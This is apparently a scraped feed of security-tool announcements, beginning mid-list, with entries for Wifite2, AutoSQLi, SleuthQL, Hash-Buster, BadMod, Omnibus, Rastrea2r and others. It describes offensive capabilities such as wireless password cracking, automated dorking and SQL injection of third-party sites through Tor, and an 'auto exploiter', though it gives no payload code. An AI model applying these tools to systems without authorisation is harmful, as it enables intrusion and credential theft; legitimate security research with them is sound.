    • Detailed help for any command or option (type help)
    • Cross-platform on both the client and the server.
    • Powerful interface with completion and multi-command support
    • Session saving/loading feature & persistent history
    • Multi-request support for large payloads (such as uploads)
    • Provides a powerful, highly configurable settings engine
    • Each setting, such as user-agent has a polymorphic mode
    • Customisable environment variables for plugin interaction
    • Provides a complete plugin development API

Supported platforms (as attacker):
  • GNU/Linux
  • Mac OS X

Supported platforms (as target):
  • GNU/Linux
  • BSD Like
  • Mac OS X
  • Windows NT

Wifite 2.1.0 - Automated Wireless Attack Tool

$
0
0

A complete re-write of wifite, a Python script for auditing wireless networks.
Wifite runs existing wireless-auditing tools for you. Stop memorizing command arguments & switches!

What's new in Wifite2?
  • Less bugs
    • Cleaner process management. Does not leave processes running in the background (the old wifite was bad about this).
    • No longer "one monolithic script". Has working unit tests. Pull requests are less-painful!
  • Speed
    • Target access points are refreshed every second instead of every 5 seconds.
  • Accuracy
    • Displays realtime Power level of currently-attacked target.
    • Displays more information during an attack (e.g. % during WEP chopchop attacks, Pixie-Dust step index, etc)
  • Educational
    • The --verbose option (expandable to -vv or -vvv) shows which commands are executed & the output of those commands.
    • This can help debug why Wifite is not working for you. Or so you can learn how these tools are used.
  • Actively developed (as of March 2018).
  • Python 3 support.
  • Sweet new ASCII banner.

What's gone in Wifite2?
  • No more WPS PIN attack, because it can take days on-average.
    • However, the Pixie-Dust attack is still an option.
  • Some command-line arguments (--wept, --wpst, and other confusing switches).
    • You can still access some of these, try ./Wifite.py -h -v

What's not new?
  • (Mostly) Backwards compatibile with the original wifite's arguments.
  • Same text-based interface everyone knows and loves.

Brief Feature List
  • Reaver (or -bully) Pixie-Dust attack (enabled by-default, force with: --wps-only)
  • WPA handshake capture (enabled by-default, force with: --no-wps)
  • Validates handshakes against pyrit, tshark, cowpatty, and aircrack-ng (when available)
  • Various WEP attacks (replay, chopchop, fragment, hirte, p0841, caffe-latte)
  • Automatically decloaks hidden access points while scanning or attacking.
    • Note: Only works when channel is fixed. Use the -c <channel> switch.
    • Disable this via --no-deauths switch
  • 5Ghz support for some wireless cards (via -5 switch).
    • Note: Some tools don't play well on 5GHz channels (e.g. aireplay-ng)
  • Stores cracked passwords and handshakes to the current directory (--cracked)
    • Includes metadata about the access point.
  • Provides commands to crack captured WPA handshakes (--crack)
    • Includes all commands needed to crack using aircrack-ng, john, hashcat, or pyrit.

Linux Distribution Support
Wifite2 is designed specifically for the latest version of Kali's rolling release (tested on Kali 2017.2, updated Jan 2018).
Other pen-testing distributions (such as BackBox) have outdated versions of the tools used by Wifite; these distributions are not supported.

Required Tools
Only the latest versions of these programs are supported:
Required:
  • iwconfig: For identifying wireless devices already in Monitor Mode.
  • ifconfig: For starting/stopping wireless devices.
  • Aircrack-ng suite, includes:
    • aircrack-ng: For cracking WEP .cap files and and WPA handshake captures.
    • aireplay-ng: For deauthing access points, replaying capture files, various WEP attacks.
    • airmon-ng: For enumerating and enabling Monitor Mode on wireless devices.
    • airodump-ng: For target scanning & capture file generation.
    • packetforge-ng: For forging capture files.
Optional, but Recommended:
  • tshark: For detecting WPS networks and inspecting handshake capture files.
  • reaver: For WPS Pixie-Dust attacks.
    • Note: Reaver's wash tool can be used to detect WPS networks if tshark is not found.
  • bully: For WPS Pixie-Dust attacks.
    • Alternative to Reaver. Specify --bully to use Bully instead of Reaver.
    • Bully is also used to fetch PSK if reaver cannot after cracking WPS PIN.
  • cowpatty: For detecting handshake captures.
  • pyrit: For detecting handshake captures.

Installing & Running
git clone https://github.com/derv82/wifite2.git
cd wifite2
./Wifite.py

Screenshots
Cracking WPS PIN using reaver's Pixie-Dust attack, then retrieving WPA PSK using bully:


Decloaking & cracking a hidden access point (via the WPA Handshake attack):


Cracking a weak WEP password (using the WEP Replay attack):



AutoSQLi - An Automatic SQL Injection Tool Which Takes Advantage Of Googler, Ddgr, WhatWaf And SQLMap

$
0
0

An Automatic SQL Injection Tool Which Takes Advantage Of ~DorkNet~ Googler, Ddgr, WhatWaf And Sqlmap.

Features
  • Save System - there is a complete save system, which can resume even when your pc crashed. - technology is cool
  • Dorking - from the command line ( one dork ): YES - from a file: NO - from an interactive wizard: YES
  • Waffing - Thanks to Ekultek, WhatWaf now has a JSON output function. - So it's mostly finished :) - UPDATE: WhatWaf is completly working with AutoSQLi. Sqlmap is the next big step
  • Sqlmapping - I'll look if there is some sort of sqlmap API, because I don't wanna use execute this time (: - Sqlmap is cool
  • REPORTING: YES
  • Rest API: NOPE

TODO:
  • Log handling (logging with different levels, cleanly)
  • Translate output (option to translate the save, which is in pickle format, to a json/csv save)
  • Spellcheck (correct wrongly spelled words and conjugational errors. I'm on Neovim right now and there is no auto-spelling check)

The Plan
This plan is a bit outdated, but it will follow this idea
  1. AutoSQLi will be a python application which will, automatically, using a dork provided by the user, return a list of websites vulnerable to a SQL injection.
  2. To find vulnerable websites, the users firstly provide a dork DOrking, which is passed to findDorks.py, which returns a list of URLs corresponding to it.
  3. Then, AutoSQLi will do some very basic checks ( TODO: MAYBE USING SQLMAP AND IT's --smart and --batch function ) to verify if the application is protected by a Waf, or if one of it's parameters is vulnerable.
  4. Sometimes, websites are protected by a Web Application Firewall, or in short, a WAF. To identify and get around of these WAFs, AutoSQLi will use WhatWaf.
  5. Finally, AutoSQLi will exploit the website using sqlmap, and give the choice to do whatever he wants !

Tor
Also, AutoSQLi should work using Tor by default. So it should check for tor availiability on startup.


SleuthQL - Burp History Parsing Tool To Discover Potential SQL Injection Points

$
0
0

SleuthQL is a python3 script to identify parameters and values that contain SQL-like syntax. Once identified, SleuthQL will then insert SQLMap identifiers (*) into each parameter where the SQL-esque variables were identified.

Supported Request Types
SleuthQL requires an export of Burp's Proxy History. To gain this export, simply navigate to your proxy history tab, highlight every item and click "Save Items". Ensure that each request is saved using base64 encoding. When SleuthQL scans the proxy history file, outside of the regular URL parameters, it will be able to identify vulnerable parameters from the following request content-types:
  • application/json
  • application/x-www-form-urlencoded
  • multipart/form-data
There are cases where this tool will break down. Namely, if there is nested content-types (such as a base64 encoded parameter within JSON data), it will not be able to identify those parameters. It also does not cover Cookies, as too often something such as CloudFlare will flag a parameter we're not interested in.

Why not Burp Pro?
Burp Pro's scanner is great, but isn't as full featured as SQLMap. Thus, if we can prioritize requests to feed into SQLMap in a batch-like manner and look for results this way, we can increase the detection rate of SQL injection.

Usage
Usage: 
.:/+ssyyyyyyso+/:.
-/s s/.
.+| SleuthQL |y+.
-s| SQL Injection Discovery Tool |s-
.shh| |ohs.
+hhhho+shhhhhhhhhhhs/hhhhhhhhhhhhhhhh.-hh/
`shhhhhhy:./yo/:---:/:`hhhhhhhhhhhhhhhs``ohho
shhhhhhhhh-`-//::+os: +hhhhhhhhh+shhhh.o-/hhho
+hhhhhhhhh:+y/.:shy/ /hhhhhhhhh/`ohhh-/h-/hhhh/
.hhhhhhhhhsss`.yhhs` .shhhhhhhh+-o-hhh-/hh`ohhhhh`
+hhhhhhhhhhhhyoshh+. `shhhhhs/-oh:ohs.ohh+`hhhhhh/
shhhhhhhhhhhhhhhhhhh/ -//::+yhy:oy::yhhy`+hhhhhho
yhhhhhhhhhhhhhhhhhhh:-:. `+y+-/:/yhhhy.-hhhhhhhs
shhhhhhhhhhhhhhhhhhh+ :/o+:.`` -hhhhhs`.hhhhhhhho
+hhhhhhhs/hhhhhhhhhhy::/:/yhhhy: .+yy/ :hhhhhhhhh/
.hhhhhhh:.hhhhhhhhhhhhhhhhhhhhhhs/- -shhhhhhhhhh`
+hhhhhh+ /hhhhhhhhhhhhhhhhhhhhho/:`+hhhhhhhhhhh/
shhhhy+ -shhhhhhhhhhhhhhhhhhh.// yhhhhhhhhhho
`ohh+://+/.`-/++ooooooooooyhhhhy.`hhhhhhhhhho
/hhhhhhhhhso++//+++oooo+:`sh+`-yhhhhhhhhh/
.s s.
-s Rhino Security Labs s-
.+y Dwight Hohnstein y+.
./s s/.
.:/+osyyyyyyso+/-.

sleuthql.py -d example.com -f burpproxy.xml

SleuthQL is a script for automating the discovery of requests matching
SQL-like parameter names and values. When discovered, it will display
any matching parameters and paths that may be vulnerable to SQL injection.
It will also create a directory with SQLMap ready request files.



Options:
-h, --help show this help message and exit
-d DOMAINS, --domains=DOMAINS
Comma separated list of domains to analyze. i.e.:
google.com,mozilla.com,rhinosecuritylabs.com
-f PROXY_XML, --xml=PROXY_XML
Burp proxy history xml export to parse. Must be base64
encoded.
-v, --verbose Show verbose errors that occur during parsing of the
input XML.

Output Files
For each potentially vulnerable request, the SQLMap parameterized request will be saved under $(pwd)/$domain/ as text files.

Video Demo



Namechk - Osint Tool Based On Namechk.Com For Checking Usernames On More Than 100 Websites, Forums And Social Networks

$
0
0

Osint tool based on namechk.com for checking usernames on more than 100 websites, forums and social networks.

Use:
  • Search available username:
    ./namechk.sh <username> -au

  • Search available username on specifics websites:
    ./namechk.sh <username> -au -co

  • Search available username list:
    ./namechk.sh -l -au

  • Search used username:
    ./namechk.sh <username> -fu

  • Search used username on specifics websites:
    ./namechk.sh <username> -fu -co

  • Search used username list:
    ./namechk.sh -l -fu

Tested webs



Msploitego - Pentesting Suite For Maltego Based On Data In A Metasploit Database

$
0
0

msploitego leverages the data gathered in a Metasploit database by enumerating and creating specific entities for services. Services like samba, smtp, snmp, http have transforms to enumerate even further. Entities can either be loaded from a Metasploit XML file or taken directly from the Postgres msf database.

Requirements
  • Python 2.7
  • Has only been tested on Kali Linux
  • software installations:
    • Metasploit
    • nmap
    • enum4linux
    • smtp-check
    • nikto

Installation
  • checkout and update the transform path inside Maltego
  • In Maltego import config from msploitego/src/msploitego/resources/maltego/msploitego.mtz

General Use

Using exported Metasploit xml file
  • run a db_nmap scan in metatasploit, or import a previous scan
    • msf> db_nmap -vvvv -T5 -A -sS -ST -Pn
    • msf> db_import /path/to/your/nmapfile.xml
    • export the database to an xml file
    • msf> db_export -f xml /path/to/your/output.xml
    • In Maltego drag a MetasploitDBXML entity onto the graph.
    • Update the entity with the path to your metasploit database file.
    • run the MetasploitDB transform to enumerate hosts.
    • from there several transforms are available to enumerate services, vulnerabilities stored in the metasploit DB

Using Postgres
  • drag and drop a Postgresql DB entity onto the canvas, enter DB details.
  • run the Postgresql transforms directly against a running DB

Notes
  • Instead of running a nikto scan directly from Maltego, I've opted to include a field to for a Nikto XML file. Nikto can take long time to run so best to manage that directly from the os.

Screenshots



TODO's
  • Connect directly to the postgres database - in progress
  • Much, much, much more tranforms for actions on generated entities.


Hash-Buster v2.0 - Tool Which Uses Several APIs To Perform Hash Lookups

$
0
0

Features
  • Automatic hash type identification
  • Supports MD5, SHA1, SHA2
  • Can extract & crack hashes from a file
  • Can find hashes from a directory, recursively
  • 6 robust APIs

As powerful as Hulk, as intelligent as Bruce Banner

Single Hash
You don't need to specify the hash type. Hash Buster will identify and crack it under 3 seconds.

Cracking hashes from a file
Hash Buster can find your hashes even if they are stored in a file like this
simple@gmail.com:21232f297a57a5a743894a0e4a801fc3
{"json@gmail.com":"d033e22ae348aeb5660fc2140aec35850c4da997"}
surrondedbytext8c6976e5b5410415bde908bd4dee15dfb167a9c873fc4bb8a81f6f2ab448a918surrondedbytext

Finding hashes from a directory
Yep, just specify a directory and Hash Buster will go through all the files and directories present in it, looking for hashes.

Insallation & Usage
You can install Hash-Buster with the following command:
make install
Cracking a single hash
buster -s <hash>
Cracking hashes from a file
buster -f /root/hashes.txt
Finding hashes from a directory
buster -d /root/Documents
Note: Please don't add / at the end of the directory



BadMod v2.0 - Detect Website CMS, Website Scanner & Auto Exploiter

$
0
0

Auto exploiter & get all server sites & bing dorker.

Version 2.0
  • Fixed colors bug
  • Fixed permissions bug
  • Added new option to scan single target
  • Added new option to scan joomla& wordpress plugins

Installation
  • Install tool
  • git clone https://github.com/MrSqar-Ye/BadMod.git
  • Install php
  • sudo apt-get install php
  • Install php curl
  • sudo apt-get install php-curl


Screen shots

Installation
  • Install tool
  • chmod +x INSTALL
    ./INSTALL

Option 1 - Get all server sites
  • Fast tool to get all server sites .

Option 2 - generate random IP's


Video



Gpredict - Satellite Tracking Application

$
0
0

Gpredict is a real-time satellite tracking and orbit prediction application. It can track a large number of satellites and display their position and other data in lists, tables, maps, and polar plots (radar view). Gpredict can also predict the time of future passes for a satellite, and provide you with detailed information about each pass.

Gpredict is different from other satellite tracking programs in that it allows you to group the satellites into visualisation modules. Each of these modules can be configured independently from the others giving you unlimited flexibility concerning the look and feel of the modules. Naturally, Gpredict will also allow you to track satellites relatively to different observer locations - at the same time.

Gpredict is free software licensed under the GNU General Public License. This gives you the freedom to use and modify gpredict to suit your needs. Gpredict is available as source package as well as precompiled binaries available via third parties.

Features:
  • Fast and accurate real-time satellite tracking using the NORAD SGP4/SDP4 algorithms.
  • No software limit on the number of satellites or ground stations.
  • Appealing visual presentation of the satellite data using maps, tables and polar plots (radar views).
  • Allows you to group satellites into modules, each module having its own visual layout, and being customisable on its own. Of course, you can use several modules at the same time.
  • Radio and antenna rotator control for autonomous trakcing.
  • Efficient and detailed predictions of future satellite passes. Prediction parameters and conditions can be fine-tuned by the user to allow both general and very specialised predictions.
  • Context sensitive pop-up menus allow you to quickly predict future passes by clicking on any satellite.
  • Exhaustive configuration options allowing advanced users to customise both the functionality and look & feel of the program.
  • Automatic updates of the Keplerian Elements from the web via HTTP, FTP, or from local files.
  • Robust design and multi-platform implementation integrates gpredict well into modern computer desktop environments, including Linux, BSD, Windows, and Mac OS X.
  • Free software licensed under the terms and conditions of the GNU General Public License allowing you to freely use it, learn from it, modify it, and re-distribute it.

Screenshots:








Omnibus - Open Source Intelligence Collection, Research, And Artifact Management

$
0
0
An Omnibus is defined as a volume containing several novels or other items previously published separately and that is exactly what the InQuest Omnibus project intends to be for Open Source Intelligence collection, research, and artifact management.
By providing an easy to use interactive command line application, users are able to create sessions to investigate various artifacts such as IP addresses, domain names, email addresses, usernames, file hashes, Bitcoin addresses, and more as we continue to expand.
This project has taken motivation from the greats that came before it such as SpiderFoot, Harpoon, and DataSploit. Much thanks to those great authors for contributing to the world of open source.
The application is written with Python 2.7 in mind and has been successfully tested on OSX and Ubuntu 16.04 environments.
As this is a pre-release of the final application, there will very likely be some bugs and uncaught exceptions or other weirdness during usage. Though for the most part, it is fully functional and can be used to begin OSINT investigations right away.

Vocabulary
Before we begin we'll need to cover some terminology used by Omnibus.
  • Artifact:
    • An item to investigate
    • Artificats can be created in two ways:
      • Using the new command or by being discoverd through module execution
  • Session:
    • Cache of artifacts created after starting the Omnibus CLI
    • Each artifact in a session is given an ID to quickly identify and retrieve the artifact from the cache
    • Commands can be executed against an artifact either by providing it's name or it's corresponding session ID
  • Module:
    • Python script that performs some arbitirary OSINT task against an artifact

Running Omnibus
Starting up Omnibus for investigation is a simple as cloning this GitHub repository, installing the Python requirements using pip install -r requirements.txt and running python2.7 omnibus-cli.py.

Omnibus Shell - Main Startup

For a visual reference of the CLI, pictured above is the Omnibus console after a new session has been started, 2 artifacts have been added to a session, and the help menu is shown.

API Keys
You must set any API keys you'd like to use within modules inside the omnibus/etc/apikeys.json file. This file is a JSON ocument with placeholders for all the services which require API keys, and is only accessed by Omnibus on a per module basis to retrieve the exact API key a module needs to execute.
It should be noted that most of the services requiring API keys have free accounts and API keys. Some free accounts may have lower resource limits, but that hasn't been a problem during smaller daily investigations or testing the application.
A handy tip: Use the cat apikeys command to view which keys you do in fact have stored. If modules are failing, check here first to ensure your API key is properly saved.

Interactive Console
When you first run the CLI, you'll be greeted by a help menu with some basic information. We tried to build the command line script to mimic some common Linux console commands for ease of use. Omnibus provides commands such as cat to show information about an artifact, rm to remove an artifact from the database, ls to view currently session artifacts, and so on.
One additional feature of note is the use of the > character for output redirection. For example, if you wish to retrieve the details of an artifact named "inquest.net" saved to a JSON file on your local disk you'd simply run the command: cat inquest.net > inquest-report.json and there it would be! This feature also works with full file paths instead of relative paths.
The high level commands you really need to know to use Omnibus are:
  • session
    • start a new session
  • new <artifact name>
    • create a new artifact for investigation
  • modules
    • display list of available modules
  • open <file path>
    • load a text file list of artifacts into Omnibus as artifacts
  • cat <artifact name | session id>
    • view beautified JSON database records
  • ls
    • show all active artifacts
  • rm
    • remove an artifact from the database
  • wipe
    • clear the current artifact session
Also, if you ever need a quick reference on the different commands available for different areas of the application there are sub-help menus for this exact purpose. Using these commands will show you only those commands available relevant to a specific area:
  • general
    • overall commands such as help, history, quit, set, clear, banner, etc.
  • artifacts
    • display commands specific to artifacts and their management
  • sessions
    • display helpful commands around managing sessions
  • modules
    • show a list of all available modules

Artifacts

Overview
Most cyber investigations begin with one or more technical indicators, such as an IP address, file hash or email address. After searching and analyzing, relationships begin to form and you can pivot through connected data points. These data points are called Artifacts within Omnibus and represent any item you wish to investigate.
Artifacts can be one of the following types:
  • IPv4 address
  • FQDN
  • Email Address
  • Bitcoin Address
  • File Hash (MD5, SHA1, SHA256, SHA512)
  • User Name

Creating & Managing Artifacts
The command "new" followed by an artifact will create that artifact within your Omnibus session and store a record of the artifact within MongoDB. This record holds the artifact name, type, subtype, module results, source, notes, tags, children information (as needed) and time of creation. Every time you run a module against a created or stored artifact, the database document will be updated to reflect the newly discovered information.
To create a new artifact and add it to MongoDB for tracking, run the command new <artifact name>. For example, to start investigation the domain deadbits.org, you would run new deadbits.org.
Omnibus will automatically determine what type the artifact is and ensure that only modules for that type are executed against the artifact.
When a module is created, new artifacts may be found during the discovery process. For example, running the "dnsresolve" command might find new IPv4 addresses not previously seen by Omnibus. If this is the case, those newly found artifacts are automatically created as new artifacts in Omnibus and linked to their parent with an additional field called "source" to identify from which module they were originally found.
Artifacts can be removed from the database using the "delete" command. If you no longer need an artifact, simply run the delete command and specify the artifacts name or the session ID if it has one.

Sessions
Omnibus makes use of a feature called "sessions". Sessions are temporary caches created via Redis each time you start a CLI session. Every time you create an artifact, that artifacts name is added to the Session along with a numeric key that makes for easy retrieval, searching, and action against the related artifact. For example if you're session held one item of "inquest.net", instead of needing to execute virustotal inquest.net you could also run virustotal 1 and you would receive the same results. In fact, this works against any module or command that uses an artiface name as it's first argument.
Sessions are here for easy access to artifacts and will be cleared each time you quit the command line session. If you wish to clear the session early, run the command "wipe" and you'll get a clean slate.
Eventually, we would like to add a Cases portion to Omnibus that allows users to create cases of artifacts, move between them, and maintain a more coherent OSINT management platform. Though for this current pre-release, we will be sticking with the Session. :)

Interacting with Session IDs instead of Artifact names



Modules
Omnibus currently supports the following list of modules. If you have suggestions or modules or would like to write one of your own, please create a pull request.
Also, within the Omnibus console, typing the module name will show you the Help information associated with that module.

Modules
  • Blockchain.info
  • Censys
  • ClearBit
  • Cymon
  • DNS subdomain enumeration
  • DNS resolution
  • DShield (SANS ISC)
  • GeoIP lookup
  • Full Contact
  • Gist Scraping
  • GitHub user search
  • HackedEmails.com email search
  • Hurricane Electric host search
  • HIBP search
  • Hunter.io
  • IPInfo
  • IPVoid
  • KeyBase
  • Nmap
  • PassiveTotal
  • Pastebin
  • PGP Email and Name lookup
  • RSS Feed Reader
  • Shodan
  • Security News Reader
  • ThreatCrowd
  • ThreatExpert
  • TotalHash
  • Twitter
  • URLVoid
  • VirusTotal
  • Web Recon
  • WHOIS
As these modules are a work in progress, some may not yet work as expected but this will change over the coming weeks as we hope to officially release version 1.0 to the world!

Machines
Machines are a simple way to run all available modules for an artifact type against a given artifact. This is a fast way if you want to gather as much information on a target as possible using a single command.
To perform this, simply run the command machine <artifact name|session ID> and wait a few minutes until the modules are finished executing.
The only caveat is that this may return a large volume of data and child artifacts depending on the artifact type and the results per module. To remedy this, we are investigating a way to remove specific artifact fields from the stored database document to make it easier for users to prune unwanted data.

Quick Reference Guide
Some quick commands to remember are:
  • session - start a new artifact cache
  • cat <artifact name>|apikeys - pretty-print an artifacts document or view your stored API keys
  • open <file path> - load a text file list of artifacts into Omnibus for investigation
  • new <artifact name> - create a new artifact and add it to MongoDB and your session
  • find <artifact name> - check if an artifact exists in the db and show the results

Reporting
Reports are the JSON output of an artifacts database document, essentially a text file version of the output of the "cat" command. But by using the report command you may specify an artifact and a filepath you wish to save the output to:
  • omnibus >> report inquest.net /home/adam/intel/osint/reports/inq_report.json
This above command overrides the standard report directory of omnibus/reports. By default, and if you do not specify a report path, all reports will be saved to that location. Also, if you do not specify a file name the report will use the following format:
  • [artifact_name]_[timestamp].json

Redirection
The output of commands can also be saved to arbitrary text files using the standard Linux character >. For example, if you wish to store the output of a VirusTotal lookup for a host to a file called "vt-lookup.json" you would simply execute:
  • virustotal inquest.net > vt-lookup.json
By default the redirected output files are saved in the current working directory, therefore "omnibus/", but if you specify a full path such as virustotal inquest.net > /home/adam/intel/cases/001/vt-lookup.json the JSON formatted output will be saved there.

Monitoring Modules
Omnibus will soon be offering the ability to monitor specific keywords and regex patterns across different sources. Once a match is found, an email or text message alert could be sent to the user to inform them on the discovery. This could be leveraged for real-time threat tracking, identifying when threat actors appear on new forums or make a fresh Pastebin post, or simply to stay on top of the current news.
Coming monitors include:
  • RSS monitor
  • Pastebin monitor
  • Generic Pastesite monitoring
  • Generic HTTP/JSON monitoring


Nipe - A Script To Make TOR Network Your Default Gateway

$
0
0

Tor enables users to surf the Internet, chat and send instant messages anonymously, and is used by a wide variety of people for both Licit and Illicit purposes. Tor has, for example, been used by criminals enterprises, Hacktivism groups, and law enforcement agencies at cross purposes, sometimes simultaneously.

Nipe is a Script to make Tor Network your Default Gateway.

This Perl Script enables you to directly route all your traffic from your computer to the Tor Network through which you can surf the Internet Anonymously without having to worry about being tracked or traced back.

Download and install:
    git clone https://github.com/GouveaHeitor/nipe
cd nipe
cpan install Switch JSON LWP::UserAgent

Commands:
    COMMAND          FUNCTION
install Install dependencies
start Start routing
stop Stop routing
restart Restart the Nipe process
status See status

Examples:

perl nipe.pl install
perl nipe.pl start
perl nipe.pl stop
perl nipe.pl restart
perl nipe.pl status

Bugs

Rastrea2R - Collecting &Amp; Hunting For IOCs With Gusto And Style

$
0
0

Ever wanted to turn your AV console into an Incident Response& Threat Hunting machine? Rastrea2r (pronounced "rastreador" - hunter- in Spanish) is a multi-platform open source tool that allows incident responders and SOC analysts to triage suspect systems and hunt for Indicators of Compromise (IOCs) across thousands of endpoints in minutes. To parse and collect artifacts of interest from remote systems (including memory dumps), rastrea2r can execute sysinternal, system commands and other 3rd party tools across multiples endpoints, saving the output to a centralized share for automated or manual analysis. By using a client/server RESTful API, rastrea2r can also hunt for IOCs on disk and memory across multiple systems using YARA rules. As a command line tool, rastrea2r can be easily integrated within McAfee ePO, as well as other AV consoles and orchestration tools, allowing incident responders and SOC analysts to collect forensic evidence and hunt for IOCs without the need for an additional agent, with 'gusto' and style!


Dependencies
  • Python 2.7.x
  • git
  • bottle
  • requests
  • yara-python

Quickstart
  • Clone the project to your local directory (or download the zip file of the project)
$git clone https://github.com/rastrea2r/rastrea2r.git
$cd rastrea2r
  • All the dependencies necessary for the tool to run can be installed within a virtual environment via the provided makefile.
$make help
help - display this makefile's help information
venv - create a virtual environment for development
clean - clean all files using .gitignore rules
scrub - clean all files, even untracked files
test - run tests
test-verbose - run tests [verbosely]
check-coverage - perform test coverage checks
check-style - perform pep8 check
fix-style - perform check with autopep8 fixes
docs - generate project documentation
check-docs - quick check docs consistency
serve-docs - serve project html documentation
dist - create a wheel distribution package
dist-test - test a wheel distribution package
dist-upload - upload a wheel distribution package
  • Create a virtual environment with all dependencies
$make venv
//Upon successful creation of the virtualenvironment, enter the virtualenvironment as instructed, for ex:
$source /Users/ssbhat/.venvs/rastrea2r/bin/activate
  • Start the rastrea2r server by going to $PROJECT_HOME/src/rastrea2r/server folder
$cd src/rastrea2r/server/
$python rastrea2r_server_v0.3.py
Bottle v0.12.13 server starting up (using WSGIRefServer())...
Listening on http://0.0.0.0:8080/
  • Now execute the client program, depending on which platform you are trying to scan choose the target python script appropriately. Currently Windows, Linux and Mac platforms are supported.
$python rastrea2r_osx_v0.3.py -h
usage: rastrea2r_osx_v0.3.py [-h] [-v] {yara-disk,yara-mem,triage} ...

Rastrea2r RESTful remote Yara/Triage tool for Incident Responders

positional arguments: {yara-disk,yara-mem,triage}

modes of operation
yara-disk Yara scan for file/directory objects on disk
yara-mem Yara scan for running processes in memory
triage Collect triage information from endpoint

optional arguments:
-h, --help show this help message and exit
-v, --version show program's version number and exit


Further more, the available options under each command can be viewed by executing the help option. i,e

$python rastrea2r_osx_v0.3.py yara-disk -h
usage: rastrea2r_osx_v0.3.py yara-disk [-h] [-s] path server rule

positional arguments:
path File or directory path to scan
server rastrea2r REST server
rule Yara rule on REST server

optional arguments:
-h, --help show this help message and exit
-s, --silent Suppresses standard output
  • For ex, on a Mac or Unix system you would do:
$cd src/rastrea2r/osx/

$python rastrea2r_osx_v0.3.py yara-disk /opt http://127.0.0.1:8080/ test.yar

Executing rastrea2r on Windows

Currently Supported functionality
  • yara-disk: Yara scan for file/directory objects on disk
  • yara-mem: Yara scan for running processes in memory
  • memdump: Acquires a memory dump from the endpoint ** Windows only
  • triage: Collects triage information from the endpoint ** Windows only

Notes
For memdump and triage modules, SMB shares must be set up in this specific way:
  • Binaries (sysinternals, batch files and others) must be located in a shared folder called TOOLS (read only)
    \path-to-share-foldertools
  • Output is sent to a shared folder called DATA (write only)
    \path-to-share-folderdata
  • For yara-mem and yara-disk scans, the yara rules must be in the same directory where the server is executed from.
  • The RESTful API server stores data received in a file called results.txt in the same directory.

Contributing to rastrea2r project
The Developer Documentation provides complete information on how to contribute to rastrea2r project

Demo videos on Youtube

Presentations

Credits & References


Viewing all 5854 articles
Browse latest View live


<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>